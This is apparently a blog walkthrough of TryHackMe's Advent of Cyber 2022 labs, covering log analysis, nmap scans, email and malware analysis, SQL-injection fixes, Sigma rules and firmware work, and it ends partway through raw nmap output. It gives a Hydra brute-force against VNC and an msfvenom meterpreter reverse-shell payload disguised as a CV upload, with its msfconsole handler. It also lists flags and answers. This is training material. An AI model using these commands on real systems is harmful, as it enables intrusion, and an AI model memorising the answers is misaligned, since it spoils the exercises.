NIST Cybersecurity Framework : The Cybersecurity Framework (CSF) was developed by the National Institute of Standards and Technology (NIST), and it provides detailed guidance for organizations to manage and reduce cybersecurity risk.
The framework focuses on five essential functions: Identify
-> Protect
-> Detect
-> Respond
-> Recover.
With these functions, the framework allows organizations to prioritize their cybersecurity investments and engage in continuous improvement towards a target cybersecurity profile.
Complete the Exercise to get the Flag!!
Ans: Answer is in the Below Photo
2. What’s the flag that they left behind?
Ans: THM{IT'S A Y3T1 CHR1$TMA$}
ls
command to list the files present in the current directory. How many log files are present?First of all Connect to the Machine or Attack box
Then type ls Command to List the Files and Folders
Ans: 2
2. Elf McSkidy managed to capture the logs generated by the web server. What is the name of this log file?
Ans: webserver.log
3. Begin investigating the log file from question #3 to answer the following questions.
Ans: No Answer Needed
4. On what day was Santa’s naughty and nice list stolen?
Let’s Investigate the File by Grep
cat webserver.log | grep “friday”
Ans: friday
5. What is the IP address of the attacker?
As the Log File Displays the IP of Attacker
Ans: 10.10.249.191
6. What is the name of the important list that the attacker stole from Santa?
cat webserver.log | grep santa
Ans: santaslist.txt
7. Look through the log files for the flag. The format of the flag is: THM{}
grep -r "THM"
Ans: The Answer is in the Above Image
8. Interested in log analysis? We recommend the Windows Event Logs room or the Endpoint Security Monitoring Module.
Ans: No Answer Needed
Before Answering Questions, Lets Enumerate the Machine using nmap
nmap -sC -sV -Pn <Machine_Ip>
Ans : Apache
2. What is the name of the service running on port 22 on the QA server?
Ans : ssh
3. What flag can you find after successfully accessing the Samba service?
Note: SMB or Samba 3.0.20 is potentially vulnerable for Command Execution for default users like root admin and guest.
Open the Attack box, then Files, and Type
smb://<machine-ip>/
Find the Username and Password Here
Ans : Answer is in the Above Image
4. What is the password for the username santahr?
Open the Userlist
Ans : Answer is in the Above Image
Let’s Start the Machine and Enumerate the Machine using nmap
sudo nmap -sS -sV <machine-ip>
MACHINE_IP
. What is the password?Let’s use hydra to Crack the Password!!
Hydra is a brute-forcing tool that helps penetration testers and ethical hackers crack the passwords of network services
VNC Servers do not need a Username to Crack with Hydra. So We are giving the Default Password list rockyou.txt and the server address
hydra -P /usr/share/wordlists/rockyou.txt vnc://<Machine-Ip> -V
Ans: 1q2w3e4r
2. Using a VNC client on the AttackBox, connect to the target of the IP address MACHINE_IP
. What is the flag written on the target’s screen?
We found the Password, so let’s try Connecting the Machine with the Password
Open Connections in Linux and Type the IP of the Machine
Enter the Password we found!!
Ans: Flag is in the Above Picture
Click Split view in the top and open the File in the Machine
Ans: Answer is in the Above image --> (From: )
2. What is the return address?
Ans: Answer is in the Above Image
3. On whose behalf was the email sent?
Answer is in the Above Image
Ans: Chief elf
4. What is the X-spam score?
Answer is in the Above Image
Ans: 3
5. What is hidden in the value of the Message-ID field?
We have to Decode the base64 String
Ans: AoC2022_Email_Analysis
6. Visit the email reputation check website provided in the task.
What is the reputation result of the sender’s email address?
Open the Website emailrep
Ans: Risky
7. Check the attachments. What is the filename of the attachment?
For Further Investigations, I’m Sending the File from Remote machine to my Machine!!
Sender — Remote Machine
Receiver — My Machine
Ans: Answer is in the Above Image (filename: )
8. What is the hash value of the attachment?
Use this Analyser to Analye the .eml File
You will get the Hash
Ans: Answer is in the Above Image
9. Visit the Virus Total website and use the hash value to search.
Navigate to the behavior section.
What is the second tactic marked in the Mitre ATT&CK section?
Open Virustotal and Search for the hash
Ans: Answer is in the Above Image (2nd Subtitle)
10. Visit the InQuest website and use the hash value to search.
What is the subcategory of the file?
Open Inquest and Click Indicator Lookup and Search with the Hash
Ans: Macro_hunter
Ans: flag{411_ur_37h_15_m1n3}
Ans: THM{5_star_Fl4gzzz}
Ans: Answer is in the Video
Let’s Use Volatility for the Investigation!!
Volatility is a powerful tool used for analyzing memory dumps on Linux, Mac, and Windows systems.
You can download the Volatility tool Here!!
Note: this initial scan may take up to 10 minutes to complete. Why not grab some water or stretch your legs?
Scan the Image for Information Gathering Purposes!! By using the Below Command,
python3 vol.py -f workstation.vmem windows.info
The Above scan will provide the basic Details from the Image.
We got the Results!
Ans: 10
python3 vol.py -f workstation.vmem windows.pslist
The Ps list in volatility is used to Scan and display the Process List from a Memory dump or an Image
Ans: mysterygift.ex
We Already Exploited the PID in the Above Question!!
Ans: 2040
Now Lets dump the Files Worked on the PID by Using the Below Command,
python3 vol.py -f workstation.vmem windows.dumpfiles --pid 2040
Ans: 16
Start the Machine and get into it
Let’s Open the File with Detect It Easy
Detect It Easy, or abbreviated “DIE” is a program for determining types of files.
“DIE” is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.
Hence it is a 64-bit Architecture!!!
Ans: 64-bit
Analyze the Image Above Image!
Ans: upx
Let’s use capa to Analyse the file
capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, or shellcode file and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.
capa -vv mysterygift
Ans: nim
Ans: 2
Here we want to open the Process Monitor at the Bottom of the Screen
Add the Process name as mysterygift.exe and click Add
Change the File Extension into exe
Now notice the Process Monitor
We Only need RegCreateKey include the Operation or you can Exclude Unnecessary packages Listed Below,
Right Click and Click Exclude!!
You may observe that only one Registry Key has both RegCreateKey and RegSetValue. This key is related to a persistence technique called Registry Run Key Modification and is commonly used by malware developers to install a backdoor.
Ans: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Double-click the Results we Found
Ans: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wishes.bat
Click on the Folder Filter at the top right in the Below Image,
Include only the CreateFile Operation
Ans: test.jpg, wishes.bat
Add the Below Filter and Search for the Domain
Here we can see, the 2 Domains in Network Activity are
Ans: bestfestivalcompany.thm, virustotal.com
Use the Below Command on CMD!
cd "Desktop\Malware Sample"
floss -n 6 mysterygift.exe | grep http://
Or You Can Use Detect It Easy to Find the Strings in the EXE
Ans: http://bestfestivalcompany.thm/favicon.ico
Start your Machine and Navigate into it
View the “Protocol Hierarchy” menu.
Drag and drop the pca file into the Wireshark and Navigate into Statistics →Protocol Hierarchy
Ans: 0.3
As we know TCP has Received more than 1000 Packets
View the “Conversations”
Navigate to Statistics → Conversations and Choose TCP
Ans: 3389
Ans: RDP
Filter the DNS packets.
Follow the Same for other Packets
The Defanged Url is Below by Cyberchef
Ans: bestfestivalcompany[.]thm,cdn[.]bandityeti[.]thm
Filter the HTTP packets.
Apply the http filter
File in Alphabetical and in Defanged Format (By Cyberchef)
Ans: favicon[.]ico,mysterygift[.]exe
The Source is the Machine Which is the host that Downloads the File in this Case!!
The Below Ip is in Defanged Format!
Ans: 10[.]10[.]29[.]186
Right Click on the Packet that uses GET Request to mysterygift.exe and click Follow → http Stream
Ans: cdn[.]bandityeti[.]thm
Right-click on the Packet of Non-executable File and Follow the http stream
Ans: Nim httpclient/1.6.8
Export objects from the PCAP file.
Calculate the file hashes.
Click File→Export Objects-> HTTP and save the File as it is
Now open Terminal and Type the Command!! (Navigate to the File if Needed)
sha256sum mysterygift.exe
Ans: 0ce160a54d10f8e81448d0360af5c2948ff6a4dbb493fe4be756fc3e2c3f900f
Search the hash value of the executable file on Virustotal.
Navigate to the “Behaviour” section.
There are multiple IP addresses associated with this file.
Open the Virustotal website and Search for the Hash
Click the Behaviour tab and Scroll below to Find IP
Ip in defanged and Alphabetical Order without Space and We don’t need the 8.8.8.8 — Dns server of Google
The Challenge is Updated, So One More IP is Added with it
Ans: 20[.]99[.]133[.]109,20[.]99[.]184[.]37,23[.]216[.]147[.]64,23[.]216[.]147[.]76
As this webpage has an IDOR Vulnerability so, Let’s change the Parameters
Ans: 134
Right Click the Image and Click Open Image in new tab
Change the Image Parameter from 100–107
Ans: THM{CLOSE_THE_DOOR}
Insufficient input validation is one of the biggest security concerns for web applications. The issue occurs when user-provided input is inherently trusted by the application. Since user input can also be controlled by an attacker, we can see how this inherent trust can lead to many problems.
Several web application vulnerabilities, such as SQL Injection, Cross Site Scripting, and Unrestricted File Upload, stem from the issue of insufficient user input validation.
Start the Machine and Paste the IP of the Machine into a Browser!
If Needed, Connect with the TryHackMe’s VPN
With unrestricted upload access to a server (and the ability to retrieve data at will), an attacker could deface or otherwise alter existing content — up to and including injecting malicious webpages, which lead to further vulnerabilities such as Cross-Site Scripting (XSS) or Cross-Site Request Forgery (CSRF)
Ans: Unrestricted
Ans: Santasidekick2
Just Upload a Dummy File!!
cv-username.exe CV file uploaded!! Santa’s team will review your CV and get in touch! Since Santa believes in Strong Security, the file has been stored outside the web root. No unethical elves allowed!
The Above Message ensures that a Person will Review the File, So we can Upload a Payload and wait for the Interaction
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<YOUR-MACHINE-IP> LPORT=8080 -f exe -o cv-username.exe
Let’s Start the Reverse Handler!!
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST <YOUR-MACHINE-IP>; set LPORT 8080; exploit"
Let’s Upload the Payload we Created in Home Directory to the Website and Wait for the Interaction!!
We Got the Reverse Connection!!
Now Let’s Exploit
We are in the system32 Directory so, let’s move back to C: Directory
cd ..
cd ..
cd Users
cd HR_Elf
cd Documents
cat flag.txt
Ans: THM{Naughty.File.Uploads.Can.Get.You.RCE}
To ensure that specific file types can be uploaded, We can verify the file extension. This will allow us to limit the type of files that can be uploaded.
Ans: file Extension validation
Even though our uploads are stored outside the web root, an attacker could leverage an additional vulnerability, such as file inclusion, to execute the file.
To counter these attempts, we can look to rename uploaded files to random names, making it almost impossible for an attacker to recover their file by name
Ans: File Renaming
There is still the risk of an attacker uploading a malicious file that targets the elves that will review the CVs. Since Santa is a high-value individual, some nation-states might even use specialized exploits found in PDF readers to upload a malicious PDF in the hopes of getting access to remove themselves from Santa’s naughty list!
In order to combat these types of malicious files, we can scan uploaded files for malware. We can install a package such as ClamAV and use it to scan the contents of each uploaded file
Ans: Malware Scanning
Open the Link by Adding your Machine IP — http://<Machine-IP>.p.thmlabs.com/
Credentials:
We can reasonably assume that the website expects an integer
id
to be sentTo avoid injections, we can convert whatever the user inputs in the id parameter to an integer. So for this purpose, we will be using the
intval()
function.This function will take a string and try to convert it into an integer. If no valid integer is found on the string, it will return 0, which is also an integer Let’s Open
search-toys.php
and change the Parameters
Change the $_GET['id'] to intval($_GET['id']) Everywhere on the elf.php File
Ans: THM{McCode, Elf McCode}
First, we will modify our initial query by replacing any parameter with a placeholder indicated with a question mark (
?
).This will tell the database we want to run a query that takes two parameters as inputs. The query will then be passed to the
mysqli_prepare()
function instead of our usualmysqli_query()
.
mysqli_prepare()
will not run the query yet but will indicate to the database to prepare the query with the given syntax. This function will return a prepared statement.
MySQL needs to know the value to put on each placeholder we defined before. So we can use the
mysqli_stmt_bind_param()
function to attach variables to each placeholder.This function requires you to send the 2 Function Parameters!!
The first parameter should be a reference to the prepared statement to which to bind the variables.
The second parameter is a string composed of one letter per placeholder to be bound, where letters indicate each variable’s data type. Since we want to pass two strings, we put
"ss"
in the second parameter, where each “s” represents a string-typed variable. You can also use the letters “i” for integers or “d” for floats
$q = "%".$_GET['q']."%";
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $q, $q);
mysqli_stmt_execute($stmt);
$toys_rs=mysqli_stmt_get_result($stmt);
Ans: THM{KodeNRoll}
We also Have to Change the Parameters here on toys.php
Change the Below Parameter $_GET[‘id’];
To intval($_GET[‘id’]); on Everywhere in the toys.php File
Ans: THM{Are we secure yet?}
Adding Username, Password parameters with a placeholder indicated with a question mark (?
) and the rest of them are same as we did on the 2nd Question, We are Adding the username and password parameter to the mysqli_stmt_bind_param method and Executing it!!
Modify the Above code as Below Code!!
<?php
require_once("connection.php");
session_start();
if(isset($_POST['username']) && isset($_POST['password'])){
$username=$_POST['username'];
$password=$_POST['password'];
$query="select * from users where username=? and password=?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
mysqli_stmt_execute($stmt);
$users_rs=mysqli_stmt_get_result($stmt);
Now, Run!!
Ans: THM{SQLi_who???}
HTML5’s built-in features help a lot with the validation of user-provided input, minimizing the need to rely on JavaScript for the same objective.
The <input>
element specifically has an array of very helpful capabilities centered around form validation.
The <input>
type, which can be set to specifically filter for an email, a URL, or even a file, among others, promptly checks whether or not the user-provided input fits the type of data that the form is asking for, and so, feedback on its validity is immediately returned to the user as a result.
For even more granular control of the input being provided, regular expressions (regex) can be integrated into the mix. Simply use it in the “pattern” attribute within the <input>
element and you’re all set.
Here is a nice resource to get started with regular expressions. A couple of examples are shown below.
1. <input type="text" id="uname" name="uname" pattern="[a-zA-Z0-9]+">
2. <input type="email" id="email" name="email" pattern=".+@0dayinventions\.com">
Start the Machine, Navigate into the RegExPractice Folder and then right -click → Open in Terminal
We Have to use the Regular Expressions as per their Structure for Username
9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553j
Ans: 8
Ans: User35
egrep ‘.+@.+\.com’ strings
br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.com
Ans: 11
Ans: 8
Ans: amg.com
Ans: fedfull.com
Ans: hussain.volt
egrep '^http(s)?.{3}(www)?.+\..+$' strings
http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur
Ans: 16
Count the Number of URLs starts with https
Ans: 7
Cyber threats and criminals have advanced tactics to ensure that they steal information and cause havoc. As you have already seen through the previous days, there are many ways in which this can be done.
There are also ways for security teams to prepare their defences and identify these threats. What would be evident is that most of the blue-team activities will require proactive approaches to analysing different logs, malware and network traffic. This brings about the practice of threat detection.
Open the Machine’s IP Address in a Browser (Make sure you Connected with TryHackMe’s VPN)
Account Creation Technique Requires
title: Local Account Creation
id: 1
status: experimental # test, stable, deprecated, unsupported.
description:
author:
date:
modified: 1
logsource: product: windows service: security category: # firewall, web, antivirus, process_creation, network_connection, file_access. detection: selection: EventID: 4720 condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level: lowtags: # Associated TTPs from MITRE ATT&CK - {attack.tactic} # MITRE Tactic - {attack.technique} # MITRE Technique
Ans: THM{n0t_just_your_u$ser}
Click on the View Log button and search for user Account
Ans: BanditYetiMini
We Have to Create a new Rule for Software Discovery and it Requires
reg query “HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer” /v svcVersion
title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:
logsource: product: windows service: sysmon category: process_creation detection: selection: EventID: - 1 Image|endswith: - reg.exe CommandLine|contains|all: - reg - query - /v - svcVersion condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level: # informational, low, medium, high or critical.tags: # Associated TTPs from MITRE ATT&CK - {attack.tactic} # MITRE Tactic - {attack.technique} # MITRE Technique
Ans: THM{wh@t_1s_Runn1ng_H3r3}
open the Log file so we can get the Path of USER
Ans: SIGMA_AOC2022\Bandit Yeti
Let’s Create a Rule for Scheduled Task and it Requires
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
title:
id: # UUID
status: # experimental, test, stable, deprecated, unsupported.
description:
author:
date:
modified:
logsource: product: windows service: sysmon category: process_creation detection: selection: EventID: 1 Image|endswith: - schtasks.exe CommandLine|contains|all: - schtasks - /create condition: selection # Action to be taken. Can use condition operators such as OR, AND, NOT when using multiple search identifiers.falsepositives: # Legitimate services or use.level: # informational, low, medium, high or critical.tags: # Associated TTPs from MITRE ATT&CK - {attack.tactic} # MITRE Tactic - {attack.technique} # MITRE Technique
Ans: THM{sch3dule_0npo1nt_101}
Open the Log file for Hashes
Ans: 2F6CE97FAF2D5EEA919E4393BDD416A7
Let’s enter the world of 0s and 1s. This then begs the question, how does hardware take electricity and generate signals? In this task, we will focus on digital communication.
For hardware communication, we use a device called a Logic Analyser to analyse the signals. This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.
USART
Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.
One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B. In essence, we connect the transmit port from one device to the receive port from the other device and vice versa.
SPI
The Serial Peripheral Interface (SPI) communication protocol is mainly used for communication between microprocessors and small peripherals such as a sensor or an SD card.
While USART communication has the clock built into the TX and RX lines, SPI uses a separate clock wire. Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable.
I2C
The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols. Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.
Furthermore, speeds are reduced to ensure communication remains reliable.
On the other hand, while SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.
For hardware communication, we use a device called a Logic Analyser to analyze the signals.
This device can be connected to the actual electrical wires that are used for communication between two devices that will capture and interpret the signals being sent.
Ans: logic analyser
USART communication has the clock built into the TX and RX lines, But SPI uses a separate clock wire.
Separating the clock (SCK) from the data (DATA) line allows for synchronous communication, which is faster and more reliable. So the trade-off is adding an additional wire, but we gain a speed and reliability boost.
Ans: Nay
Universal Synchronous/Asynchronous Receiver-Transmitter (USART) communication, or as it is better known, serial communication, is a protocol that uses two wires.
One wire is used to transmit (TX) data from device A to device B, and the other wire is used to receive (RX) data on device A from device B
Ans: Yea
The Inter-Integrated Circuit (I2C) communication protocol was created to deal with the drawbacks of both the USART and SPI communication protocols.
Because USART is asynchronous and has the clock built into the transmit and receive lines, devices have to agree ahead of time on the configuration of communication.
Furthermore, speeds are reduced to ensure communication remains reliable.
Ans: Nay
SPI is faster and more reliable, it requires many more wires for communication, and every single additional peripheral requires one more Chip Select wire.
I2C attempts to solve these problems. Similar to USART, I2C only makes use of two lines for communication. I2C uses a Serial Data (SDA) line and Serial Clock (SCL) line for communication.
Ans: Nay
SPI is Faster and more reliable than I2C
Ans: Yea
An external clock line is used, communication is still faster and more reliable than USART, and while it is slightly slower than SPI, the use of the Address signal means up to 1008 devices can be connected to the same two lines and will be able to communicate.
Ans: 1008
Open the Remote Machine’s Split View
Open the Logic 2.4.2 Application and open the Capture — santa
Click the Analyzers and add an Async Serial Analyser and Give Input Channel as Channel 1 and Baud/Bit rate as 4800
Ans: 9600
Add Another Async serial Analyser and Give Input channel as Channel 0 and Baud/Bit Rate as 9600
Ans: THM{Hacking.Hardware.Is.Fun}
What is Firmware Reverse Engineering?
Every embedded system, such as cameras, routers, smart watches etc., has pre-installed firmware, which has its own set of instructions running on the hardware’s processor.
It enables the hardware to communicate with other software running on the device. The firmware provides low-level control for the designer/developer to make changes at the root level.
Firmware Reversing Steps
BinWalk: A firmware extraction tool that extracts code snippets inside any binary by searching for signatures against many standard binary file formats like
zip, tar, exe, ELF,
etc.Binwalk has a database of binary header signatures against which the signature match is performed.
The common objective of using this tool is to extract a file system like
Squashfs, yaffs2, Cramfs, ext*fs, jffs2,
etc., which is embedded in the firmware binary. The file system has all the application code that will be running on the device.
Open the Machine’s Split View
cd bin
binwalk -E -N firmwarev2.2-encrypted.gpg
cd ..
cd bin-unsigned/
extract-firmware.sh firmwarev1.0-unsigned
Password: Santa1010
grep -ir paraphrase
cat fmk/rootfs/gpg/secret.txt
Paraphrase : Santa@2022
gpg — import fmk/rootfs/gpg/private.key
Type the Paraphrase that we Found
gpg --import fmk/rootfs/gpg/public.key
gpg --list-secret-keys
Once the keys are imported, McSkidy decrypts the firmware using the gpg command. Again change the directory by entering the command cd .. and then cd bin
cd ..
cd bin
gpg firmwarev2.2-encrypted.gpg
cat ~/bin/fmk/rootfs/flag.txt
Ans: THM{WE_GOT_THE_FIRMWARE_CODE}
Ans: Santa@2022
Use the Command below to find the Firmware of rootfs
Make Sure, you are in the rootfs Directory
ls -lah * | grep rootfs
Ans: 2.6.31
Use AttackBox for Exploitation
First of All, Let’s Perform a Nmap Scan
nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500
Output:
┌──(cyberw1ng㉿root)-[~]
└─$ nmap -p- 10.10.150.215 -vv -sV -sC --min-rate 1500
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 11:06 IST Scanning 10.10.150.215 [2 ports] Scanning 10.10.150.215 (10.10.150.215) [65535 ports]#Discovered open port 22/tcp on 10.10.150.215 #Discovered open port 80/tcp on 10.10.150.215 #Discovered open port 1883/tcp on 10.10.150.215Not shown: 65532 closed tcp ports (conn-refused)PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 17e553cf2a0ebe5b6af0233dacdc07f3 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCv6o9FZFxN/PUlNXGXBJ0QWwpolESTvkSYxvDR9yW3p1K2KVAY4VEeqawoFSIGm3+chCvQk2q/e7FE5LA6yuXFsXEyPbN0lerQBwTVwVTTn6CCjTeEC/EUpsV+J1/LDeidajS9vBW5oXeWzysZ2fy8TH3xwlakFP/cFv9Tc5WwreH5IOi6qwPh9x3h/6wft8mNbBKczaFW9mQPEIaoMhSwKKeNJSJYF/EvJMp/TFdojKZYzeDnuYfU0n0ZWA/gHtX0MA2yJaYwTohbUxgNrFpV8Ev1iqxCI5Gethg8e9muEMSjvGF+kib3D9o78K3Dka6s76TlHy8AacJoz7DPQbIiXdGL2ZskWv+Kye+W0vqJTAxhxGQfWFCzCAPwv3PqcHHqDIXQY8dHy9MwUrK48wNON69KJFreklYtwatJdJtlJLpONtPqRHD0h6dVYx7L4GX4++E56pm6nX4IeEOsJflKPPJIDYGBl3E4+Zo5r9C6lZnE/ZOsKq+MkU1XeFe15TU= | 256 032ef2d20c95e3d97eeca0aa7ba16cd0 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIdK3mhrZdHxEouf+P+8jbtteJBj0tnC33tj74GD5/YfMY2nHXbSkW+UPQZFU8ZtZ3uK9PziLvm4YAg6ufyBhFs= | 256 2e90c7317e62d51e89f1544597290ad6 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM8v/s/JZbJOpNarVPoCrl1flxQML3GP5VXhkyy94Y67 80/tcp open http syn-ack WebSockify Python/3.8.10 | fingerprint-strings: | GetRequest: | HTTP/1.1 405 Method Not Allowed | Server: WebSockify Python/3.8.10 | Date: Thu, 22 Dec 2022 05:37:24 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 472 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 405</p> | <p>Message: Method Not Allowed.</p> | <p>Error code explanation: 405 - Specified method is invalid for this resource.</p> | </body> | </html> | HTTPOptions: | HTTP/1.1 501 Unsupported method ('OPTIONS') | Server: WebSockify Python/3.8.10 | Date: Thu, 22 Dec 2022 05:37:25 GMT | Connection: close | Content-Type: text/html;charset=utf-8 | Content-Length: 500 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" | "http://www.w3.org/TR/html4/strict.dtd"> | <html> | <head> | <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> | <title>Error response</title> | </head> | <body> | <h1>Error response</h1> | <p>Error code: 501</p> | <p>Message: Unsupported method ('OPTIONS').</p> | <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p> | </body> |_ </html> |_http-title: Error response |_http-server-header: WebSockify Python/3.8.10#1883/tcp open mosquitto version 1.6.9 syn-ack | mqtt-subscribe: | Topics and their most recent payloads: | $SYS/broker/clients/total: 4 | $SYS/broker/clients/active: 4 | $SYS/broker/load/publish/received/15min: 2.03 | $SYS/broker/load/sockets/5min: 0.88 | $SYS/broker/load/bytes/received/1min: 276.74 | $SYS/broker/store/messages/bytes: 180 | $SYS/broker/publish/messages/sent: 70 | $SYS/broker/load/connections/15min: 0.32 | $SYS/broker/uptime: 374 seconds | $SYS/broker/publish/messages/received: 37 | $SYS/broker/bytes/sent: 2735 | $SYS/broker/load/publish/sent/15min: 4.21 | $SYS/broker/load/bytes/sent/1min: 1482.40 | $SYS/broker/publish/bytes/received: 740 | $SYS/broker/heap/maximum: 57352 | $SYS/broker/clients/connected: 4 | $SYS/broker/load/publish/received/1min: 6.19 | $SYS/broker/publish/bytes/sent: 897 | $SYS/broker/load/messages/sent/1min: 42.00 | $SYS/broker/load/connections/5min: 0.65 | $SYS/broker/version: mosquitto version 1.6.9 | $SYS/broker/load/bytes/sent/15min: 165.49 | $SYS/broker/store/messages/count: 39 | $SYS/broker/subscriptions/count: 4 | $SYS/broker/retained messages/count: 42 | $SYS/broker/load/bytes/received/15min: 83.09 | $SYS/broker/load/sockets/15min: 0.43 | $SYS/broker/load/publish/sent/5min: 10.76 | #device/init: FFISRRN3EAJUZSUVK1QB | $SYS/broker/load/messages/received/15min: 3.46 | $SYS/broker/load/messages/received/5min: 7.36 | $SYS/broker/messages/received: 63 | $SYS/broker/messages/sent: 96 | $SYS/broker/clients/maximum: 4 | $SYS/broker/bytes/received: 1521 | $SYS/broker/heap/current: 56872 | $SYS/broker/load/bytes/received/5min: 175.57 | $SYS/broker/load/connections/1min: 1.26 | $SYS/broker/load/sockets/1min: 1.41 | $SYS/broker/load/publish/sent/1min: 36.35 | $SYS/broker/load/messages/sent/15min: 5.64 | $SYS/broker/messages/stored: 39 | $SYS/broker/load/messages/sent/5min: 13.84 | $SYS/broker/load/messages/received/1min: 11.85 | $SYS/broker/load/publish/received/5min: 4.28 |_ $SYS/broker/load/bytes/sent/5min: 426.78 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.93%I=7%D=12/22%Time=63A3ED14%P=x86_64-pc-linux-gnu%r(Get SF:Request,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x2 SF:0WebSockify\x20Python/3\.8\.10\r\nDate:\x20Thu,\x2022\x20Dec\x202022\x2 SF:005:37:24\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html; SF:charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUB SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x SF:20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x SF:20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Con SF:tent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x SF:20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head> SF:\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20 SF:response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405 SF:</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20A SF:llowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expla SF:nation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20t SF:his\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOptio SF:ns,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nS SF:erver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Thu,\x2022\x20Dec\x SF:202022\x2005:37:25\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20t SF:ext/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HT SF:ML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\ SF:x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\ SF:x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-eq SF:uiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\ SF:x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x 